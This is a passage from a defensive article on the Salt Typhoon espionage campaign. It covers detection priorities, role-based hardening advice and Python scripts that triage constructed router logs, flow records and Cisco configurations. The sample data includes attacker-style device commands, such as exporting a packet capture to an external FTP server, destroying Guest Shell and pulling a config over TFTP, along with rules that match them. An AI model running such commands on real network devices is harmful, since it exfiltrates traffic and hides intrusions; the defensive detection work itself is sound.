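Feb  8 10:16:06 tac-01 tac_plus[2201]: 10.0.9.1 svc_backup vty1 10.0.9.50 stop task_id=80 service=shell priv-lvl=15 cmd=monitor capture mycap export ftp://198.51.100.80/mycap.pcap <cr>
Feb  8 10:20:00 tac-01 tac_plus[2201]: 10.0.9.1 netops vty2 10.0.9.51 stop task_id=81 service=shell priv-lvl=15 cmd=show ip interface brief <cr>
Feb  8 10:21:00 tac-01 tac_plus[2201]: 10.0.9.1 svc_backup vty1 10.0.9.50 stop task_id=82 service=shell priv-lvl=15 cmd=guestshell destroy <cr>
"""

# Two record shapes (constructed formats): IOS XE config logger and tac_plus accounting.
PARSER_RE = re.compile(
    r"(?P<device>\S+) \d+: %PARSER-5-CFGLOG_LOGGEDCMD: User:(?P<user>\S+)\s+logged command:(?P<cmd>.*)$")
TACACS_RE = re.compile(
    r"(?P<device>\d{1,3}(?:\.\d{1,3}){3}) (?P<user>\S+) \S+ \S+ stop task_id=\d+ "
    r"service=shell priv-lvl=\d+ cmd=(?P<cmd>.*?)\s*<cr>")

# Ordered: the more specific export rule must win over the generic capture rule.
RULES = [
    ("capture_export", re.compile(r"\bexport (ftp|tftp|scp|sftp|https?)://")),
    ("packet_capture", re.compile(r"^monitor capture\b")),
    ("guestshell", re.compile(r"^guestshell (enable|run|disable|destroy)\b")),
    ("guestshell_helper", re.compile(r"\b(chvrf|dohost)\b")),  # only if the shell session itself is logged
    ("tunnel", re.compile(r"^(interface Tunnel\d|tunnel (mode|destination|source)\b)")),
    ("acl_change", re.compile(r"^(ip |ipv6 )?access-list\b")),
    ("local_account", re.compile(r"^username\b")),
]


def parse_line(line: str):
    """Return {device, user, cmd} for a recognised command record, else None."""
    for rx in (PARSER_RE, TACACS_RE):
        m = rx.search(line)
        if m:
            return {"device": m["device"], "user": m["user"], "cmd": m["cmd"].strip()}
    return None


def classify(cmd: str):
    """First matching rule name for an executed command, or None."""
    for name, rx in RULES:
        if rx.search(cmd):
            return name
    return None


def triage(text: str):
    """Per-command alerts plus one correlated alert when the same user on the
    same device both enabled and destroyed Guest Shell (container used and removed)."""
    alerts = []
    guestshell_verbs = defaultdict(set)  # (device, user) -> {"enable", "run", ...}
    for line in text.splitlines():
        ev = parse_line(line)
        if ev is None:
            continue
        rule = classify(ev["cmd"])
        if rule is None:
            continue
        alerts.append({**ev, "rule": rule})
        if rule == "guestshell":
            guestshell_verbs[(ev["device"], ev["user"])].add(ev["cmd"].split()[1])
    for (device, user), verbs in guestshell_verbs.items():
        if {"enable", "destroy"} <= verbs:
            alerts.append({"device": device, "user": user, "cmd": "",
                           "rule": "guestshell_enable_then_destroy"})
    return alerts


if __name__ == "__main__":
    for a in triage(SAMPLE_LOGS):
        print(f"{a['rule']:30} {a['device']:12} {a['user']:12} {a['cmd']}")
```

The correlation is the part worth keeping: a single guestshell enable is often an administrator, but enable, a capture exported to an external FTP server, and destroy in one session from a recently created account is the advisory's sequence end to end.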
Priority 3: Network Traffic Analysis
- Monitor for GRE/IPsec tunnels to unexpected destinations
- Alert on SSH connections to non-standard ports (22x22 pattern)
- Watch for HTTPS on high ports (18xxx range)
- Track TACACS+/RADIUS traffic to unapproved servers
- Monitor for unusual FTP/TFTP transfers from network devices
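Priority 3 as an added example, not from the article or from any vendor: a Python flow triage that applies the SSH port pattern, the GRE/ESP-to-external check and the TACACS+ allow-list over constructed NetFlow-style records. The CSV, the edge-router address 10.0.9.1, the approved TACACS+ server 10.0.9.10 and the "Internet" RFC 5737 addresses are all constructed. It decides "internal" by explicit RFC 1918 lookup rather than ipaddress.is_private, because Python's ipaddress marks the RFC 5737 documentation ranges as private and that would silently hide every sample hit.

```python
"""Flow-record triage for the network-level Salt Typhoon indicators.
Added example for this article (not from the page or any vendor). SAMPLE_FLOWS is
a constructed NetFlow/IPFIX-style export; 10.0.9.1 stands in for an edge router,
10.0.9.10 for the approved TACACS+ server, RFC 5737 addresses for the Internet."""
import ipaddress
import re
from dataclasses import dataclass

SAMPLE_FLOWS = """\
src_ip,dst_ip,proto,dst_port,bytes
10.0.9.1,10.0.9.10,6,49,1200
10.0.9.1,198.51.100.78,6,49,980
10.0.9.1,203.0.113.50,6,22022,48211
10.0.9.1,203.0.113.50,6,22,5120
10.0.9.1,203.0.113.51,6,55022,77000
10.0.9.1,203.0.113.52,6,18443,900000
10.0.9.1,203.0.113.53,47,0,5000000
10.0.9.1,10.0.20.4,47,0,2000
10.0.5.33,203.0.113.60,6,443,15000
10.0.9.1,203.0.113.54,6,57722,3000
10.0.9.1,10.0.9.2,6,22122,700
"""

# Approved AAA servers (assumption for the example); anything else on TCP/49 is a finding.
APPROVED_TACACS = {"10.0.9.10"}

# Port shapes from the indicator list: 22x22, four/five-digit ports ending in 22,
# 57722 (IOS XR sshd_operns) and the 18xxx high-HTTPS range. Port 22 itself is excluded.
SUSPICIOUS_PORT_RE = re.compile(r"^(22[0-9]22|[0-9]{2,3}22|57722|18[0-9]{3})$")

# Explicit RFC 1918 lookup; ipaddress.is_private would also treat the RFC 5737
# documentation ranges used here as private and hide the sample hits.
INTERNAL_NETS = [ipaddress.ip_network(n) for n in ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16")]

TUNNEL_PROTOS = {47: "gre", 50: "esp"}


@dataclass
class Finding:
    rule: str
    severity: str
    src_ip: str
    dst_ip: str
    proto: int
    dst_port: int


def is_internal(ip: str) -> bool:
    addr = ipaddress.ip_address(ip)
    return any(addr in net for net in INTERNAL_NETS)


def suspicious_port(port: int) -> bool:
    return 0 < port <= 65535 and port != 22 and bool(SUSPICIOUS_PORT_RE.match(str(port)))


def parse_flows(text: str):
    """Parse the header-led CSV into dicts with numeric proto/port/bytes."""
    lines = text.strip().splitlines()
    header = lines[0].split(",")
    rows = []
    for line in lines[1:]:
        rec = dict(zip(header, line.split(",")))
        for key in ("proto", "dst_port", "bytes"):
            rec[key] = int(rec[key])
        rows.append(rec)
    return rows


def triage(flows):
    """Apply the four checks to every flow; a flow may raise more than one finding."""
    findings = []
    for f in flows:
        src, dst, proto, port = f["src_ip"], f["dst_ip"], f["proto"], f["dst_port"]
        external = not is_internal(dst)
        if proto == 6 and port == 49 and dst not in APPROVED_TACACS:
            findings.append(Finding("tacacs_unapproved_server", "high", src, dst, proto, port))
        if proto == 6 and suspicious_port(port):
            # Internal hits still matter: a compromised internal router is the likely peer.
            findings.append(Finding("suspicious_port_pattern", "high" if external else "medium",
                                    src, dst, proto, port))
        if proto in TUNNEL_PROTOS and external:
            findings.append(Finding(f"{TUNNEL_PROTOS[proto]}_tunnel_external", "high", src, dst, proto, port))
        if proto == 17 and port in (500, 4500) and external:
            findings.append(Finding("isakmp_external", "medium", src, dst, proto, port))
    return findings


if __name__ == "__main__":
    for fnd in triage(parse_flows(SAMPLE_FLOWS)):
        print(f"{fnd.severity:6} {fnd.rule:26} {fnd.src_ip} -> {fnd.dst_ip} proto={fnd.proto} port={fnd.dst_port}")
```

The port check matches on port number alone, exactly like the Sigma rule above, so treat a hit as a lead and confirm the protocol from the session (SSH banner, TLS handshake) before escalating; the GRE and TACACS+ checks need no such confirmation because the protocol number and the allow-list are the evidence.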
Priority 4: Firmware/Software Integrity
- Verify firmware hashes against vendor database
- Compare memory images against known-good states
- Use Cisco's Network Device Integrity (NDI) methodology
- Check for unexpected processes or files on network devices
- Validate cryptographic signatures on all updates
Implications for US and Allied Organizations
The Strategic Threat
Salt Typhoon's expansion to Norway is not an isolated incident—it's evidence of systematic targeting of allied nations' critical infrastructure. Organizations in the US, Canada, UK, Australia, and other Five Eyes nations should consider themselves potential targets.
Key Implications:
- The campaign is ongoing and expanding. Norway is the latest public disclosure, but intelligence suggests operations continue across all 80+ affected countries.
- Edge device vulnerabilities are the common thread. Whether it's US telecoms or Norwegian energy companies, Salt Typhoon succeeds by exploiting known vulnerabilities in network infrastructure.
- Detection is extremely difficult. The combination of rootkits, container-based evasion, and living-off-the-land techniques means many organizations may already be compromised without knowing.
- The goal is long-term access, not smash-and-grab. Salt Typhoon establishes persistent access for ongoing intelligence collection and potential future disruption operations.
- Provider relationships are attack vectors. Salt Typhoon has demonstrated ability to pivot through trusted relationships between carriers and service providers.
Sector-Specific Risk Assessment
CRITICAL RISK:
| Sector | Why Salt Typhoon Targets It |
|---|---|
| Telecommunications | Primary target; direct access to communications data |
| Energy / Utilities | Critical infrastructure; disruption potential; economic intelligence |
| Defense / Aerospace | Military intelligence; technology acquisition; allied capabilities |
HIGH RISK:
| Sector | Why Salt Typhoon Targets It |
|---|---|
| Maritime / Shipping | Supply chain visibility; Arctic routes; naval intelligence |
| Technology | Intellectual property; supply chain compromise |
| Government Services | Policy intelligence; diplomatic communications |
| Financial Services | Economic intelligence; sanctions evasion |
ELEVATED RISK:
| Sector | Why Salt Typhoon Targets It |
|---|---|
| Manufacturing | Technology transfer; supply chain access |
| Research / Academia | R&D exploitation; talent identification |
| Healthcare | Research data; biotech IP |
Regulatory Implications
Current:
- FCC is drafting stricter telecom cybersecurity requirements
- Congressional oversight intensifying (Senate Commerce Committee hearings)
- Potential mandatory breach reporting for CALEA system compromises
- SEC cybersecurity disclosure rules apply to material breaches
Expected:
- Mandatory edge device security standards for critical infrastructure
- Enhanced supply chain security requirements
- Increased reporting obligations for nation-state intrusions
- Stricter penalties for inadequate security measures
The $10 Million Question
The FBI's $10 million bounty on Salt Typhoon members—one of the highest ever offered—signals the severity of this threat at the highest levels of government. This isn't just cybercrime. This is state-sponsored espionage that has:
- Compromised the US law enforcement surveillance apparatus
- Accessed communications of senior political figures
- Penetrated critical telecommunications infrastructure across allied nations
- Demonstrated ability to maintain persistent, undetected access for years
Organizations should calibrate their response accordingly.
Actionable Recommendations by Role
For CISOs and Security Executives
Immediate Actions (This Week):
- Confirm your edge device inventory is complete. You cannot protect what you don't know about. Audit all routers, switches, firewalls, VPN concentrators, and other network infrastructure.
- Validate patching status for Salt Typhoon CVEs. Priority focus on CVE-2023-20198, CVE-2024-21887, CVE-2024-3400, CVE-2023-48788.
- Request a configuration baseline report from your network team. If one doesn't exist, create it immediately.
- Brief your board and executive team. This is a material threat that warrants executive awareness. The FBI bounty and Norway disclosure are clear indicators of severity.
- Activate your threat hunting capability. If you don't have one, engage a third party immediately.
Short-Term Actions (30 Days):
- Commission a network infrastructure security assessment. Traditional pentests focus on applications—you need infrastructure-level assessment.
- Review and segment provider/vendor access. Salt Typhoon exploits trusted relationships. Map all third-party network access.
- Evaluate out-of-band management capability. If your management plane is compromised, can you still administer your network?
- Review incident response playbooks. Ensure you have specific procedures for network device compromise, not just endpoint incidents.
- Engage with your ISAC. If you're in telecommunications, energy, maritime, or defense—coordinate with sector peers.
Strategic Actions (90 Days):
- Implement network device integrity monitoring. This is non-negotiable for critical infrastructure.
- Evaluate zero-trust architecture for infrastructure management. Reduce reliance on perimeter security alone.
- Conduct tabletop exercise for APT scenario. Simulate Salt Typhoon-style intrusion. Test detection, response, and recovery.
- Review insurance coverage. Nation-state exclusions may apply. Understand your exposure.
For Security Operations (SOC/IR)
Detection Priorities:
- Deploy IOCs immediately. Add IP addresses and file hashes to SIEM, EDR, and network monitoring tools.
- Implement YARA rules on file inspection systems. Focus on exfiltration tools (cmd1, cmd3, sft, new2).
- Enable Sigma rules in SIEM. Prioritize Guest Shell monitoring, non-standard SSH detection, and unauthorized TACACS+ connections.
- Configure Snort/Suricata rules. Focus on CVE exploit detection for Cisco IOS XE and Ivanti vulnerabilities.
- Create alerts for unusual network device activity:
  - Configuration changes outside change windows
  - SSH connections on non-standard ports
  - GRE/IPsec tunnel creation
  - TACACS+ to unexpected servers
  - FTP/TFTP from infrastructure devices
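The alert conditions above map directly onto standard Cisco IOS syslog messages (`%SYS-5-CONFIG_I`, `%SEC_LOGIN-5-LOGIN_SUCCESS`, and the `%PARSER-5-CFGLOG_LOGGEDCMD` messages produced by `archive` / `log config` / `logging enable`). The following is an added example, not code from the article or from any vendor, that runs those rules over a handful of constructed log lines. The change window, the allowlisted TACACS+ server, the hostnames, and the addresses are assumptions for the sample; in production the equivalent logic belongs in SIEM correlation rules fed by centralized syslog.

```python
import re
from dataclasses import dataclass
from datetime import datetime, time

# Constructed sample syslog lines modelled on Cisco IOS message formats; they are
# not from any real device or incident. Collector prefix: "Mon dd HH:MM:SS host seq:".
SAMPLE_LOGS = """\
Feb  7 02:31:10 r1-edge 201: %SYS-5-CONFIG_I: Configured from console by netops on vty0 (10.20.0.15)
Feb  7 14:02:44 r1-edge 202: %SYS-5-CONFIG_I: Configured from console by admin on vty1 (198.51.100.23)
Feb  7 14:03:01 r1-edge 203: %SEC_LOGIN-5-LOGIN_SUCCESS: Login Success [user: admin] [Source: 198.51.100.23] [localport: 22] at 14:03:01 UTC Sat Feb 7 2026
Feb  7 14:05:19 r1-edge 204: %SEC_LOGIN-5-LOGIN_SUCCESS: Login Success [user: admin] [Source: 198.51.100.23] [localport: 57722] at 14:05:19 UTC Sat Feb 7 2026
Feb  7 14:06:40 r1-edge 205: %PARSER-5-CFGLOG_LOGGEDCMD: User:admin  logged command:interface Tunnel100
Feb  7 14:06:41 r1-edge 206: %PARSER-5-CFGLOG_LOGGEDCMD: User:admin  logged command:tunnel mode gre ip
Feb  7 14:07:02 r1-edge 207: %PARSER-5-CFGLOG_LOGGEDCMD: User:admin  logged command:tacacs server BACKUP
Feb  7 14:07:03 r1-edge 208: %PARSER-5-CFGLOG_LOGGEDCMD: User:admin  logged command:address ipv4 203.0.113.77
Feb  7 14:09:30 r1-edge 209: %SYS-5-CONFIG_I: Configured from tftp://203.0.113.77/r1.cfg by admin
Feb  7 15:00:00 r1-edge 210: %PARSER-5-CFGLOG_LOGGEDCMD: User:netops  logged command:ip route 10.30.0.0 255.255.0.0 10.20.0.1
"""

ASSUMED_YEAR = 2026  # RFC 3164 timestamps carry no year; assumed for the sample

PREFIX = re.compile(r"^(?P<ts>[A-Z][a-z]{2}\s+\d{1,2} \d{2}:\d{2}:\d{2}) (?P<host>\S+) \d+: (?P<msg>%.*)$")
CONFIG = re.compile(r"%SYS-5-CONFIG_I: Configured from (?P<source>\S+) by (?P<user>\S+)")
LOGIN = re.compile(r"%SEC_LOGIN-5-LOGIN_SUCCESS:.*\[Source: (?P<src>[\d.]+)\] \[localport: (?P<port>\d+)\]")
CFGLOG = re.compile(r"%PARSER-5-CFGLOG_LOGGEDCMD: User:(?P<user>\S+)\s+logged command:(?P<cmd>.*)$")
TUNNEL_CMD = re.compile(r"interface Tunnel\d+|tunnel mode (gre|ipsec)|crypto (map|ipsec)")


@dataclass
class Finding:
    line_no: int
    rule: str
    detail: str


def detect(log_text, change_window=(time(2, 0), time(4, 0)),
           allowed_tacacs=frozenset({"10.20.0.50"}), ssh_ports=frozenset({22})):
    """Apply the alert rules to syslog text and return the findings in line order."""
    findings = []
    in_tacacs = False  # True while the logged commands are inside a "tacacs server" block
    for line_no, raw in enumerate(log_text.splitlines(), 1):
        m = PREFIX.match(raw)
        if not m:
            continue
        msg = m["msg"]
        ts = datetime.strptime(f"{ASSUMED_YEAR} {m['ts']}", "%Y %b %d %H:%M:%S")

        if (c := CONFIG.search(msg)):
            # Rule 1: configuration change outside the approved change window
            if not (change_window[0] <= ts.time() < change_window[1]):
                findings.append(Finding(line_no, "config-change-outside-window",
                                        f"{c['user']} at {ts:%H:%M} from {c['source']}"))
            # Rule 5: configuration pulled from an FTP/TFTP server
            if c["source"].startswith(("tftp://", "ftp://")):
                findings.append(Finding(line_no, "config-loaded-via-ftp-tftp", c["source"]))
            continue

        if (l := LOGIN.search(msg)):
            # Rule 2: interactive login on a port other than the sanctioned SSH port(s)
            if int(l["port"]) not in ssh_ports:
                findings.append(Finding(line_no, "login-on-nonstandard-port",
                                        f"{l['src']} -> port {l['port']}"))
            continue

        if (g := CFGLOG.search(msg)):
            cmd = g["cmd"].strip()
            # Rule 4: TACACS+ server definition pointing at a host not on the allowlist
            if cmd.startswith("tacacs server "):
                in_tacacs = True
            elif in_tacacs and cmd.startswith("address ipv4 "):
                ip = cmd.split()[2]
                if ip not in allowed_tacacs:
                    findings.append(Finding(line_no, "tacacs-unexpected-server", ip))
            elif in_tacacs and cmd.split()[0] in {"key", "port", "timeout"}:
                pass  # still inside the tacacs server block
            else:
                in_tacacs = False
            # Rule 3: GRE/IPsec tunnel configuration; also flag packet-capture setup
            if TUNNEL_CMD.match(cmd):
                findings.append(Finding(line_no, "tunnel-configured", cmd))
            elif cmd.startswith("monitor capture "):
                findings.append(Finding(line_no, "packet-capture-configured", cmd))
    return findings


if __name__ == "__main__":
    for f in detect(SAMPLE_LOGS):
        print(f"line {f.line_no:2d}  {f.rule:30s} {f.detail}")
```

The in-window change at 02:31 by the expected operator produces nothing, while the afternoon session from 198.51.100.23 trips every rule in turn; the TACACS+ rule only fires on the `address ipv4` line, so a server block that reuses an allowlisted address stays quiet.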
Threat Hunting Priorities:
- Audit all network device configurations. Compare against baselines. Look for:
  - Unauthorized ACL entries
  - Unexpected local accounts
  - New SSH authorized keys
  - Unusual routing entries
  - PCAP configurations you didn't create
- Review Guest Shell status on Cisco devices. Any unexpected containers should trigger investigation.
- Analyze network flows for tunnel patterns. Look for persistent connections to unusual destinations, especially using GRE, mGRE, or IPsec.
- Check firmware integrity. Verify hashes against vendor-provided values.
- Review authentication logs. Look for unusual TACACS+/RADIUS activity, especially successful authentications from unexpected sources.
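The configuration audit above is a diff problem: everything in the running configuration that is not in the approved baseline needs a category and an owner. The following added example (written for this article, not the project's or any vendor's code) parses two constructed Cisco-style configurations, respects the indentation that places `permit`/`deny` lines under an access list or `key-hash` lines under `ip ssh pubkey-chain`, and buckets each addition into the hunting categories listed above plus Guest Shell prerequisites (`iox`) and tunnel interfaces. Device names, addresses and hashes are constructed placeholders.

```python
import re
from collections import defaultdict

# Constructed approved baseline (placeholder secrets and key hashes, not real values)
BASELINE = """\
hostname r1-edge
username netops privilege 15 secret 9 $9$placeholder
aaa new-model
tacacs server ISE-PRIMARY
 address ipv4 10.20.0.50
ip ssh version 2
ip ssh pubkey-chain
 username netops
  key-hash ssh-rsa 0123456789ABCDEF0123456789ABCDEF
ip access-list extended MGMT-IN
 permit tcp 10.20.0.0 0.0.0.255 any eq 22
 deny ip any any log
ip route 0.0.0.0 0.0.0.0 192.0.2.1
logging host 10.20.0.60
no ip http server
no ip http secure-server
"""

# Constructed running configuration with several unexplained additions and two removals
RUNNING = """\
hostname r1-edge
username netops privilege 15 secret 9 $9$placeholder
username svc-backup privilege 15 secret 9 $9$placeholder2
aaa new-model
tacacs server ISE-PRIMARY
 address ipv4 10.20.0.50
tacacs server BACKUP
 address ipv4 203.0.113.77
ip ssh version 2
ip ssh pubkey-chain
 username netops
  key-hash ssh-rsa 0123456789ABCDEF0123456789ABCDEF
 username svc-backup
  key-hash ssh-rsa FEDCBA9876543210FEDCBA9876543210
ip access-list extended MGMT-IN
 permit tcp 10.20.0.0 0.0.0.255 any eq 22
 permit tcp host 198.51.100.23 any eq 57722
 deny ip any any log
ip route 0.0.0.0 0.0.0.0 192.0.2.1
ip route 10.99.0.0 255.255.0.0 203.0.113.1
monitor capture CAP interface GigabitEthernet0/0/0 both
iox
interface Tunnel100
 tunnel source GigabitEthernet0/0/0
 tunnel destination 203.0.113.77
 tunnel mode gre ip
no ip http server
"""

# Category is decided by the top-level line that owns the entry, so nested
# "permit" or "key-hash" lines inherit it from their parent block.
CATEGORIES = [
    ("local-account", r"^username "),
    ("ssh-key", r"^ip ssh pubkey-chain"),
    ("acl-entry", r"^(ip )?access-list "),
    ("tacacs-server", r"^tacacs server "),
    ("route", r"^ip route "),
    ("packet-capture", r"^monitor capture "),
    ("container", r"^(iox$|app-hosting )"),
    ("tunnel", r"^interface Tunnel"),
]


def parse(config_text):
    """Return a set of (context, line) pairs; context is the chain of parent
    lines, derived from Cisco-style leading-space indentation."""
    entries = set()
    stack = []  # [(indent, line), ...] of the current ancestors
    for raw in config_text.splitlines():
        if not raw.strip() or raw.startswith("!"):
            continue
        indent = len(raw) - len(raw.lstrip(" "))
        line = raw.strip()
        while stack and stack[-1][0] >= indent:
            stack.pop()
        context = tuple(l for _, l in stack)
        entries.add((context, line))
        stack.append((indent, line))
    return entries


def classify(context, line):
    top = context[0] if context else line
    for category, pattern in CATEGORIES:
        if re.match(pattern, top):
            return category
    return "other"


def compare(baseline_text, running_text):
    """Bucket every line added since the baseline and list every line removed."""
    base, run = parse(baseline_text), parse(running_text)
    added = defaultdict(list)
    for context, line in sorted(run - base):
        added[classify(context, line)].append(" / ".join(context + (line,)))
    removed = [" / ".join(c + (l,)) for c, l in sorted(base - run)]
    return {"added": dict(added), "removed": removed}


if __name__ == "__main__":
    report = compare(BASELINE, RUNNING)
    for category, lines in report["added"].items():
        print(f"[added: {category}]")
        for entry in lines:
            print("   ", entry)
    print("[removed]")
    for entry in report["removed"]:
        print("   ", entry)
```

Removed lines matter as much as added ones: in the sample, `no ip http secure-server` and the `logging host` entry have vanished, which re-exposes the web UI and silences the central log collector. Tools such as RANCID or Oxidized produce the raw diff for you; the categorization step is what turns it into a hunting queue.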
Incident Response Preparation:
- Preserve network device logs and configurations. Many network devices have limited log retention—ensure centralized collection.
- Document out-of-band access procedures. If you discover compromise, you need alternative management access.
- Prepare device re-imaging procedures. Complete device rebuild may be necessary; ensure you can execute quickly.
- Identify forensic support for network devices. This requires specialized expertise—identify vendors now, not during an incident.
For Network Engineering Teams
Immediate Hardening:
- Patch all devices against Salt Typhoon CVEs. No exceptions. Legacy devices that cannot be patched must be isolated or replaced.
- Disable unused services and protocols:
  - Smart Install (CVE-2018-0171)
  - Web UI on Cisco IOS XE if not required
  - SNMP with community strings (use SNMPv3)
  - Telnet (SSH only)
- Implement MFA for all network management access. No exceptions for "emergency" accounts.
- Review and tighten ACLs. Document all entries. Remove anything that can't be justified.
- Disable Guest Shell if not required. If required, document use cases and monitor closely.
Configuration Standards:
- Implement role-based access control. Minimum privilege for all accounts.
- Standardize SSH configurations:
  - Use standard port 22 only for authorized management
  - Implement key-based authentication
  - Disable password authentication where possible
  - Use strong key algorithms (ED25519, RSA 4096)
- Configure comprehensive logging:
  - Enable configuration change logging
  - Enable login/logout logging
  - Send logs to centralized SIEM
  - Set appropriate log buffer sizes
- Implement TACACS+/RADIUS properly:
  - Use encrypted communications
  - Implement authorization policies
  - Log all authentication attempts
  - Rotate credentials regularly
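The hardening and configuration standards above can be expressed as a compliance check that runs against every exported configuration: a set of lines that must be present, a set that must be absent, and a set that is acceptable only with a documented use case. The following added example (not from the article or any vendor tool) encodes those checks with standard Cisco IOS commands and runs them against a constructed weak configuration and a constructed hardened one. Secrets and keys are placeholders; MFA cannot be verified from a device configuration and is therefore not checked here.

```python
import re

# Constructed "before" configuration showing the weak settings the article tells you to remove
WEAK_CONFIG = """\
hostname r1-edge
enable password cisco123
username admin password 7 0822455D0A16
ip http server
ip http secure-server
snmp-server community public RO
snmp-server community private RW
ip ssh version 1
iox
line vty 0 4
 transport input telnet ssh
 login local
"""

# Constructed "after" configuration meeting the standards above (placeholder secrets)
HARDENED_CONFIG = """\
hostname r1-edge
no vstack
enable secret 9 $9$placeholder
aaa new-model
aaa authentication login default group tacacs+ local
aaa authorization exec default group tacacs+ local
aaa accounting exec default start-stop group tacacs+
aaa accounting commands 15 default start-stop group tacacs+
tacacs server ISE-PRIMARY
 address ipv4 10.20.0.50
 key 7 placeholder
username netops privilege 15 secret 9 $9$placeholder
ip ssh version 2
ip ssh pubkey-chain
 username netops
  key-hash ssh-rsa 0123456789ABCDEF0123456789ABCDEF
no ip http server
no ip http secure-server
snmp-server group MON v3 priv
snmp-server user monitor MON v3 auth sha placeholder priv aes 128 placeholder
login on-success log
login on-failure log
logging buffered 64000 informational
logging host 10.20.0.60
archive
 log config
  logging enable
  notify syslog contenttype plaintext
  hidekeys
line vty 0 4
 transport input ssh
 login authentication default
"""

# (rule id, kind, pattern matched against each stripped line, why it matters)
RULES = [
    ("smart-install-disabled", "required", r"^no vstack$", "Smart Install (CVE-2018-0171) left enabled"),
    ("ssh-v2", "required", r"^ip ssh version 2$", "SSH protocol version 2 not enforced"),
    ("ssh-pubkey", "required", r"^ip ssh pubkey-chain$", "no key-based SSH authentication configured"),
    ("syslog-central", "required", r"^logging host \S+", "logs not sent to a central collector"),
    ("login-success-log", "required", r"^login on-success log$", "successful logins not logged"),
    ("login-failure-log", "required", r"^login on-failure log$", "failed logins not logged"),
    ("aaa", "required", r"^aaa new-model$", "AAA (TACACS+/RADIUS) not enabled"),
    ("cmd-accounting", "required", r"^aaa accounting commands 15 .*group tacacs\+", "privileged commands not accounted"),
    ("config-change-log", "required", r"^logging enable$", "configuration change logging (archive/log config) missing"),
    ("snmp-community", "forbidden", r"^snmp-server community ", "SNMPv1/v2c community string present"),
    ("telnet", "forbidden", r"^transport input .*telnet", "Telnet accepted on a vty line"),
    ("http-ui", "forbidden", r"^ip http server$", "IOS XE web UI enabled over HTTP"),
    ("https-ui", "forbidden", r"^ip http secure-server$", "IOS XE web UI enabled over HTTPS"),
    ("weak-user-password", "forbidden", r"^username \S+ (privilege \d+ )?password ", "user with reversible password instead of secret"),
    ("enable-password", "forbidden", r"^enable password ", "enable password instead of enable secret"),
    ("guest-shell-prereq", "review", r"^iox$", "IOx enabled (Guest Shell prerequisite); requires a documented use case"),
]


def audit(config_text):
    """Return (rule id, status, why) for every rule the configuration fails."""
    lines = [l.strip() for l in config_text.splitlines() if l.strip() and not l.startswith("!")]
    failures = []
    for rule_id, kind, pattern, why in RULES:
        hit = any(re.match(pattern, line) for line in lines)
        if kind == "required" and not hit:
            failures.append((rule_id, "missing", why))
        elif kind in ("forbidden", "review") and hit:
            failures.append((rule_id, kind, why))
    return failures


if __name__ == "__main__":
    for name, cfg in (("weak", WEAK_CONFIG), ("hardened", HARDENED_CONFIG)):
        result = audit(cfg)
        print(f"{name}: {len(result)} finding(s)")
        for rule_id, status, why in result:
            print(f"  {status:9s} {rule_id:24s} {why}")
```

The `review` kind is deliberate: `iox` is not wrong in itself, but every device where it is enabled should appear on a list with a named owner, which is what makes the Guest Shell monitoring recommended elsewhere in this article tractable.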
Monitoring and Verification:
- Implement automated configuration backup and comparison, using tools such as RANCID, Oxidized, or vendor solutions.
- Schedule regular firmware integrity checks. Compare hashes against vendor database.
- Monitor for unauthorized containers. Alert on Guest Shell activity.
- Review routing tables for anomalies. Unexpected routes may indicate compromise.
For Threat Intelligence Teams
Collection Priorities:
- Monitor for updated Salt Typhoon IOCs. CISA updates advisories regularly. Subscribe to alert feeds.
- Track alias activity. Research on Earth Estries, GhostEmperor, and FamousSparrow may reveal techniques before they are attributed to Salt Typhoon.
- Watch for Nordic-region disclosures. Sweden, Denmark, Finland may follow Norway with their own announcements.
- Monitor vendor security bulletins. Cisco, Ivanti, Palo Alto, Fortinet—new vulnerabilities will be exploited.
- Engage with sector ISACs. E-ISAC, MS-ISAC, IT-ISAC, Maritime-ISAC may have private indicators.
Analysis Priorities:
- Map your organization against Salt Typhoon targeting patterns. Telecommunications, energy, defense, maritime, and government services are priority targets.
- Assess supply chain exposure. Your telecom provider may be compromised. Your network equipment vendor may be targeted.
- Evaluate geopolitical factors. Organizations with presence in China-interest regions (Arctic, South China Sea, Taiwan) face elevated risk.
- Track regulatory developments. FCC rules, congressional action, and international coordination will shape requirements.
Sharing Priorities:
- Report suspicious activity to CISA. Salt Typhoon is a priority threat—information sharing is critical.
- Coordinate with sector peers. Collective defense requires shared intelligence.
- Contribute IOCs to community platforms. MISP, OTX, ThreatConnect—help the community.
Conclusion: The 100-Year Strategy
Salt Typhoon represents a new paradigm in nation-state cyber operations. This is not opportunistic cybercrime or smash-and-grab data theft. This is systematic, patient, and strategic intelligence collection executed by a well-resourced state apparatus with generational time horizons.
The Norwegian disclosure adds another chapter to what is already the most significant telecommunications breach in history. But the geographic expansion tells us something important: Salt Typhoon is not slowing down. They are accelerating.
Key Takeaways
- The threat is global and ongoing. 200+ organizations across 80 countries. The campaign continues.
- Edge devices are the attack surface. Routers, switches, firewalls, VPN concentrators—the infrastructure you probably don't monitor as closely as endpoints.
- Known vulnerabilities enable nation-state attacks. CVEs from 2018 are still being exploited. Patching network infrastructure is non-negotiable.
- Detection requires new approaches. Traditional endpoint security doesn't see infrastructure compromise. Configuration monitoring, integrity verification, and container auditing are essential.
- Allied nations are being systematically targeted. If your organization operates in telecommunications, energy, defense, or maritime—or if you have partners in Norway or in Five Eyes nations such as Canada, the UK, or Australia—you are in the target zone.
The Call to Action
The FBI's $10 million bounty, the 25-agency CISA advisory, and Norway's unprecedented public disclosure all point to the same conclusion: this is the most serious cyber espionage threat facing Western critical infrastructure today.
Your organization's response should reflect that reality:
- If you haven't patched Salt Typhoon CVEs, patch them today.
- If you don't have network device configuration baselines, create them this week.
- If you're not monitoring Guest Shell and container activity on Cisco devices, start immediately.
- If you haven't conducted a threat hunt for Salt Typhoon TTPs, commission one now.
The threat actors behind Salt Typhoon are playing a long game. They're patient. They're well-resourced. And they're already inside networks that don't know they're compromised.
Don't be one of them.
References and Resources
Government Advisories
- CISA Advisory AA25-239A: Countering Chinese State-Sponsored Actors - August 27, 2025
- Norwegian PST National Threat Assessment 2026 - February 6, 2026
- US Treasury Sanctions Press Release - January 17, 2025
- FBI Most Wanted - Salt Typhoon Operators - April 2025
Vendor Research
- Trend Micro: Game of Emperor - Earth Estries Intrusions - November 25, 2024
- Eclypsium: Detecting and Mitigating Salt Typhoon - February 19, 2025
- DomainTools: Inside Salt Typhoon - January 6, 2026
- Picus Security: Salt Typhoon Threat Analysis - December 20, 2024
News Coverage
- TechCrunch: China's Salt Typhoon Hackers Broke Into Norwegian Companies - February 6, 2026
- The Record: Norwegian Intelligence Discloses Salt Typhoon Attacks - February 6, 2026
